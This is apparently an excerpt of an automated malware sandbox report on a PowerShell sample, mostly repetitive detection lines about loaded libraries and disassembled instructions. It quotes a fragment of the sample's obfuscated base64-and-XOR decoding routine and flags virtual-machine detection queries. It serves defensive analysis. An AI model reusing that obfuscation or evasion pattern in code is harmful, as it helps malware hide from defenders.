                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: powershell.exe, 00000002.00000002.2614845846.0000000006EF0000.00000004.08000000.00040000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains potential unpacker
                  Source: 2.2.powershell.exe.6ef0000.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 2.2.powershell.exe.6ef0000.1.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 2.2.powershell.exe.6ef0000.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 2.2.powershell.exe.6ef0000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 2.2.powershell.exe.6ef0000.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Found suspicious powershell code related to unpacking or dynamic code loading
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($z));$byteString = $enc.GetBytes($string);$xordData = $(for ($i = 0; $i -lt $byteString.length; ) {for ($j = 0; $j -lt $xorkey.length; $j++) {$byteString[$i] -bxor $xorkey[$j];$i++;if
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 2.2.powershell.exe.6e60000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.2613418529.0000000006E60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7DB71C push esp; retf 0_2_00007FFD9B7DB828
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7D4F29 push ebp; ret 0_2_00007FFD9B7D4F58
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FFD9B7D00AD pushad ; iretd 0_2_00007FFD9B7D00C1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455F4CD pushfd ; iretd 2_2_0455F4E1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455E793 push es; iretd 2_2_0455E7A2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455E783 push es; iretd 2_2_0455E792
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455F145 push ss; iretd 2_2_0455F14A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455F11B push ss; iretd 2_2_0455F12A
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455FCC3 push esp; iretd 2_2_0455FCD2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455FCED push edi; iretd 2_2_0455FD02
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455FCBD push ebx; iretd 2_2_0455FCC2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0455FD0D push edi; iretd 2_2_0455FD12
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D16D91 push es; retf 2_2_06D16D98
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D1BADA push FFFFFF8Bh; ret 2_2_06D1BADE
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D10A3D push esp; retf 2_2_06D10A4D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D1BB14 push FFFFFF8Bh; ret 2_2_06D1BB18
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06D1BB2B push FFFFFF8Bh; iretd 2_2_06D1BB2F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F45F1F push es; retf 2_2_06F45F20
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F43DE5 push ebp; ret 2_2_06F43DE8
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F4729B push es; ret 2_2_06F4729C
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F43219 push ds; iretd 2_2_06F4321F
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F45BD1 push es; retf 2_2_06F45C38
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F4319E pushfd ; iretd 2_2_06F431A1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F47100 push edx; ret 2_2_06F4710B
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F6CF13 push es; retf 2_2_06F6CF14
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_06F6391C push eax; retf 2_2_06F6391D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08165A06 pushad ; iretd 2_2_08165A08
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0816406B push FFFFFF8Bh; retf 2_2_0816406D
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_08163CDD push FFFFFF8Bh; iretd 2_2_08163CDF
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_081664DB push FFFFFF8Bh; iretd 2_2_081664DD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_081652D9 push FFFFFF8Bh; iretd 2_2_081652DB
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                  Query firmware table information (likely to detect VMs)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSystem information queried: FirmwareTableInformationJump to behavior
